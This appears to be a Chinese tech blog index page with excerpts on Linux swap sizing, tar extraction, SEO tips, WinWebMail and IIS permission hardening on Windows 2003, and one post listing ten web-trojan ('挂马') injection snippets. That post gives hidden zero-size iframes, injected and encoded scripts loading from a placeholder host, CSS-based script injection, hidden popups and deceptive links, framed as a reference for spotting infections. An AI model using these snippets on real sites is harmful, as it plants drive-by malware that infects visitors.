悠然小屋

不自重者,取辱。不自长者,取祸。不自满者,受益。不自足者,博闻!

«   2019年3月   »
123
45678910
11121314151617
18192021222324
25262728293031
搜索
Tags列表
最新留言
    最近发表
    文章归档
    友情链接

      linux 服务器增加物理内存后,记得swap

       

      Linux 机器增加内存后 应该顺便把 swap 交换分区也加大 。 大约的比例是2-2.5倍物理内存 ,估计很多童鞋都会不记得做这个事情!

      可以增强服务器关键时候的性能

       

      PHP+FPM导致内存耗光的问题 .

       

      最近总是发现fpm挂掉,查看日志是因为内存耗光了。  

      tar如何解压文件到指定的目录

       

      tar czvf mysql.tar.gz /var/lib/mysql
      压缩的文件,我想解压到当前目录下,而不是绝对路径下,该如何解压?
      tar cxvf mysql.tar.gz的话,会覆盖/var/lib/mysql下全部文件吧?我现在就一个表坏了,想单独恢复一个表的资料,而不是恢复全部数据库,所以要解压到指定的目录下,再把那个表资料找不来恢复。
       
      #tar zxvf mysql.tar.gz -C /home/aaa

       

      挂马代码集合

       

      挂马代码

      挂马代码大全

      ps:检查文件是否被挂马的时候可以参考下!

      一:框架挂马

      <iframe src=地址 width=0 height=0></iframe> 

      二:js文件挂马

      首先将以下代码
      document.write("<iframe width='0' height='0' src='地址'></iframe>");
      保存为xxx.js,
      则JS挂马代码为
      <script language=javascript src=xxx.js></script> 

      三:js变形加密

      <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
      muma.txt可改成任意后缀
      四:body挂马

      <body onload="window.location='地址';"></body>

      五:隐蔽挂马

      top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

      六:css中挂马

      body { 
      background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')} 

      七:JAJA挂马

      <SCRIPT language=javascript> 
      window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
      </script>

      八:图片伪装

      <html>
      <iframe src="网马地址" height=0 width=0></iframe>
      <img src="图片地址"></center>
      </html>

      九:伪装调用:

      <frameset rows="444,0" cols="*">
      <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
      <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
      </frameset>

      十:高级欺骗

      <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
      <SCRIPT Language="JavaScript">
      function www_163_com ()
      {
      var url="网马地址";
      open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
      }
      </SCRIPT>

       

      推广时用的资料和工具

      SEO工具
      Google关键字工具

      百度关键字工具
      关键字密度
      相似页面检测
      Googledance
      url检测工具
      生成网站地图
      竞争对手比较
      搜索引擎收录
      分类目录收录
      Google排名
      Yahoo排名
      PageRank值
      WebRank值
      PR值更新

      搜索引擎登陆登录google
      登录dmoz
      登录netscape
      登录AddMe
      登录intelseek
      登录Altavista
      登录Excite
      登录lycos
      登录Looksmart
      登录Webcrawle

      B2B推广网站
      http://www.sd-auto.net/
      http://www.hisuppliers.com            
      http://www.dianzinet.com/            
      http://www.chexun.com.cn/              
      http://www.hc360.com                  
      http://www.allofcar.com
      http://cn.ec51.com
      http://www.hisuppliers.com
      http://www.tradevv.com/
      http://www.buyer-china.com/
      http://www.tradekey.com/
      http://www.tradeindia.com/
      http://www.made-in-china.com/
      http://www.sulekhab2b.com/
      http://www.commerce.com.tw/
      http://www.tradevv.com/
      http://www.manufacture.com.tw/
      http://www.ec21.com/
      http://www.ecplaza.com/
      http://www.allproducts.com/
      http://www.indiamart.com/
      http://www.tradeeasy.com/
      http://www.fuzing.com

      Winwebmail目录下及根目录的用户权限设置

      Winwebmail目录下及根目录的用户权限设置很重要,  经多次调试,我的情况如下:

      1、Winwebmail安装的根目录下必须给Users用户读取及写入的权限,如:

      安装在D:\winwebmail目录下,则D盘必须给UsersUsers用户读取及写入的权限;

      2、Winwebmail安装目录必须给Users角色的用户或Users读取及写入的权限,如我的是给IUSR_*********用户访问Webmail, 但IUSR_*******是Guests用户,所以我的服务器权限是继承了D:\盘的权限,再加入IUSR_*********全权控制的权限。

      以上是我的设置,并经过多次调试成功。 


      系统环境:
      WIN2003企业版+IIS6+MCAFEE8+XXXX防火墙软件
      WINWEBMAIL 3.6.3.1(安装路径 D:\WINWEBMAIL)
      权限设置: 
      D盘根目录
      超级用户,SYSTEM用户:完全控制
      IIS来宾帐号,UESER用户: 读取和运行,列出文件夹目录,读取

      D:\WINWEBMAIL
      超级用户,SYSTEM用户:完全控制
      IIS来宾帐号,UESER用户:完全控制

      除去了EVERYONE完全控制后的权限设置方面,相对于WIN2000 SERVER来说,主要增加了USER用户的访问权限
      (原因是什么?自己找找WIN2003方面的资料看看)
      以上设置均经过了测试(客户端可以使用WEB访问邮件系统,正常收发邮件)
      以上设置仅供参考~


      在 win2k3 下安装 WinWebMail 3.6.3.1 完全攻略手册!

      作者:老Q  时间:2004-12-4  文档类型:原创  来自:蓝色理想

      1)查看硬盘:两块9.1G SCSI 硬盘(实容量8.46*2)

      2)分区
      系统分区X盘7.49G
      WEB 分区X盘1.0G
      邮件分区X盘8.46G(带1000个100M的邮箱足够了)

      3)安装WINDOWS SERVER 2003

      4)打基本补丁(防毒)...在这之前一定不要接网线!

      5)在线打补丁

      6)卸载或禁用微软的SMTP服务(Simple Mail Transpor Protocol),否则会发生端口冲突

      7)安装WinWebMail,然后重启服务器使WinWebMail完成安装.并注册.然后恢复WinWebMail数据.

      8)安装Norton 8.0并按WinWebMail帮助内容设定,使Norton与WinWebMail联合起到邮件杀毒作用(将Norton更新到最新的病毒库)
      8.1 启用Norton的实时防护功能
      8.2 必须要设置对于宏病毒和非宏病毒的第1步操作都必须是删除被感染文件,并且必须关闭警告提示!!
      8.3 必须要在查毒设置中排除掉安装目录下的 \mail 及其所有子目录,只针对WinWebMail安装文件夹下的 \temp 文件夹进行实时查毒。注意:如果没有 \temp 文件夹时,先手工创建此 \temp 文件夹,然后再进行此项设置。

      9)将WinWebMail的DNS设置为win2k3中网络设置的DNS,切记,要想发的出去最好设置一个不同的备用DNS地址,对外发信的就全靠这些DNS地址了

      10)给予安装 WinWebMail 的盘符以及父目录以 Internet 来宾帐户 (IUSR_*) 允许 [读取\运行\列出文件夹目录] 的权限.
      WinWebMail的安装目录,INTERNET访问帐号完全控制
      给予[超级用户/SYSTEM]在安装盘和目录中[完全控制]权限,重启IIS以保证设定生效.

      11)防止外发垃圾邮件:
      11.1 在服务器上点击右下角图标,然后在弹出菜单的“系统设置”-->“收发规则”中选中“启用SMTP发信认证功能”项,有效的防范外发垃圾邮件。
      11.2 在“系统设置”-->“收发规则”中选中“只允许系统内用户对外发信”项。
      11.3 在服务器上点击右下角图标,然后在弹出菜单的“系统设置”-->“防护”页选中“启用外发垃圾邮件自动过滤功能”项,然后再启用其设置中的“允许自动调整”项。
      11.4 “系统设置”-->“收发规则”中设置“最大收件人数”-----> 10.
      11.5 “系统设置”-->“防护”页选中“启用连接攻击保护功能”项,然后再设置“启用自动保护功能”.
      11.6 用户级防付垃圾邮件,需登录WebMail,在“选项 | 防垃圾邮件”中进行设置。

      12)打开IIS 6.0, 确认启用支持 asp 功能, 然后在默认站点下建一个虚拟目录(如: mail), 然后指向安装 WinWebMail 目录下的 \Web 子目录, 打开浏览器就可以按下面的地址访问webmail了:
      http://<;;你的IP或域名>/mail/什么? 嫌麻烦不想建? 那可要错过WinWebMail强大的webmail功能了, 3分钟的设置保证物超所值  :)

      13)Web基本设置:
      13.1 确认“系统设置”-->“资源使用设置”内没有选中“公开申请的是含域名帐号”
      13.2 “系统设置”-->“收发规则”中设置Helo为您域名的MX记录

      13.3.解决SERVER 2003不能上传大附件的问题:
      13.3.1 在服务里关闭 iis admin service 服务。
      13.3.2 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件。
      13.3.3 用纯文本方式打开,找到 ASPMaxRequestEntityAllowed 把它修改为需要的值(可修改为10M即:10240000),默认为:204800,即:200K。
      13.3.4 存盘,然后重启 iis admin service 服务。

      13.4.解决SERVER 2003无法下载超过4M的附件的问题
      13.4.1 先在服务里关闭 iis admin service 服务。
      13.4.2 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件。
      13.4.3 用纯文本方式打开,找到 AspBufferingLimit 把它修改为需要的值(可修改为20M即:20480000)。
      13.4.4 存盘,然后重启 iis admin service 服务。

      13.5.解决大附件上传容易超时失败的问题.
      在IIS中调大一些脚本超时时间,操作方法是: 在IIS的“站点或(虚拟目录)”的“主目录”下点击“配置”按钮,设置脚本超时间为:300秒(注意:不是Session超时时间)。

      13.6.解决Windows 2003的IIS 6.0中,Web登录时经常出现"[超时,请重试]"的提示.
      将WebMail所使用的应用程序池“属性-->回收”中的“回收工作进程”以及"属性-->性能"中的“在空闲此段时间后关闭工作进程”这两个选项前的勾号去掉,然后重启一下IIS即可解决.

      13.7.解决通过WebMail写信时间较长后,按下发信按钮就会回到系统登录界面的问题.
      适当增加会话时间(Session)为 60分钟。在IIS站点或虚拟目录属性的“主目录”下点击[配置---选项],就可以进行设置了(SERVER 2003默认为20分钟).

      13.8.安装后查看WinWebMail的安装目录下有没有 \temp 目录,如没有,手工建立一个.

      14)做邮件收发及10M附件测试(内对外,内对内,外对内).

      15)打开2003自带防火墙,并打开POP3.SMTP.WEB.远程桌面.充许此4项服务, OK, 如果想用IMAP4或SSL的SMTP.POP3.IMAP4也需要打开相应的端口.

      16)再次做邮件收发测试(内对外,内对内,外对内).

      17)改名、加强壮口令,并禁用GUEST帐号。

      18)改名超级用户、建立假administrator、建立第二个超级用户。

      都搞定了!忙了半天, 现在终于可以来享受一把 WinWebMail 的超强 webmail 功能了, let's go!


      注意:

      如果服务器同时作为WEB服务器,而WEB服务器的IIS用户组的权限有没有进行详细而严格的设置的话,上面这样的权限可能会造成跨站攻击,更详细的设置方法可以参考:

      如WEB站点是D:\WEB Mail是D:\MAIL

      1,对于WinWebMail权限配置还是按照官方说明配置。
      2,对于Web站点权限配置是每一个站点独立分配一个帐户,然后这些帐户全部属于guest组,其权限控制按照我们平时做的去配置即可。
      3, 最关键的是D盘根目录以及Mail目录,方法就是把D盘根目录设置为guest用户组完全拒绝,这样Webshell就无法访问D盘根目录;同样, Mail目录也如法炮制,这样做可以防止通过Webshell下载Mail系统的配置文件进而破解出一些东西来攻击Mail系统;还有一个地方就是 Mail下的子目录Web目录,也就是存放Mail系统的ASP文件目录,对于这个目录也进行同样的权限控制,这样即使由于ASP程序出现漏洞,也不会对 MAIL系统造成危害,包括其子目录Temp也可以这样处理。
      4,对于第三步的权限控制不继承到子目录,只对当前目录有效。

       

      win2003 服务器 安全设置 技术实例(比较安全的方法)

       文章着重谈需要的权限,也就是最终文件夹或硬盘需要的权限,可以防御各种木马入侵,提权攻击,跨站攻击等,本实例经过多次试验.安全性能很好.服务器基本没有被木马威胁的担忧了. 

      1、服务器安全设置之--硬盘权限篇

      这里着重谈需要的权限,也就是最终文件夹或硬盘需要的权限,可以防御各种木马入侵,提权攻击,跨站攻击等。本实例经过多次试验,安全性能很好,服务器基本没有被木马威胁的担忧了。 

      说说网址带不带www的问题

       

      在做域名解析时,应该设置一个不带www的域名。这样,当用户使用不带www的域名时,可以正常访问你的网站。

      让你少奋斗3个月的36个SEO问答

       

      1、做网站前需要做些什么?
      答:做好网站SEO整体策划,主要包括选择关键词,判断竞争对手,关键词的布局等。
      2、什么的域名和空间?
      答:域名好比门牌号,也就是找到你的唯一标致,空间就是房子的空间,可以任意换,但是门牌号始终不会改变!比如域名:www.csuper.cn 比较大的空间商有:万网,新网等。
      3、什么是目标关键词?
      答:就是网站的主要关键词,是放在首页的关键词。
      4、什么是长尾关键词?
      答:字数比较长的关键词,百度指数比较低,竞争不激烈,容易优化的关键词。
      5、什么是百度指数?
      答:查询地址:http://index.baidu.com/ 反映一天内搜索量的大小,百度指数越高,说明受到关注的人越多,竞争也更加激烈!
      6、反向链接是什么?
      答:一个页面给另外一个页面的链接
      7、怎么查反向链接?
      答:用雅虎搜索 link:www.919900.com
      8、alt是什么?
      答:图片的属性,可以用来优化图片,增加关键词的密度,百度收录你的图片但是根本不能读出你图片里面的内容。
      9、404页面的作用?
      答:当网站中出现死链的时候,404页面可以防止蜘蛛的跳出,同时增加用户的体验度,不损失流量。
      10、PV是指什么?
      答:网站页面的访问率
      11、CMS是指什么?
      答:即是建站程序的内容管理系统,常见的有dedecms
      12.网站日志是什么?
      答:网站所有访问的记录
      13、PR指是什么?
      答:谷歌对网页权重排名的评价,PR越高说明权重越高。
      14、网站首页标题的主要关键词最好出现几次?
      答:3次
      15、网站标题的字数限制多少?
      答:25个字以内
      16、网站描述限制的字数多少?
      答:50个字以内
      16、网站描述是什么?
      答:就是对本站一个简单的描述,会出现搜索引擎的结果页面域名的下方,描述里面应该包含网站的目标关键词,且核心关键词重复2—3次。
      17、301重定向是指?
      答:把一个网址转移到另一个网址上
      18、次导航的作用?
      答:增加关键词的密度。
      19、什么是导出链接?
      答:从一个网站向外导出的链接。
      20、网站导出链接的安全范围是多少?
      答:30个以内安全,50个以外可能会出现危险。
      21、什么是首选域?
      答:做网站时主要使用的域名  如:csuper.cn

      关键词如何放置

       

      1. 首先关键词应该在文章的每个段落里; 

      IBM X3850 X5服务器ESXi 5安装配置全过程——安装

       

      本系列以一台新上架的IBM X3850 X5服务器为例,从开始做RAID5到VMWARE ESXI5的安装配置进行全程演示,希望对你有些帮助。

      如何安装Virtualmin/Webmin在centos5上(一行命令安装virtualmin面板)

       

      虽然Virtualmin/Webmin面板对于新手来说比较复杂,不太适合,但是它比较稳定,在国外口碑比较好。适合懂得ssh并有linux管理经验的人使用。本脚本,推荐使用 centos 5 32位/64位

      Powered By Z-BlogPHP 1.5.2 Zero & Theme by Washun Copyright Csuper All Rights Reserved. 湘ICP备18017694 网络是工具,不是玩具 QQ:493754678 [登录]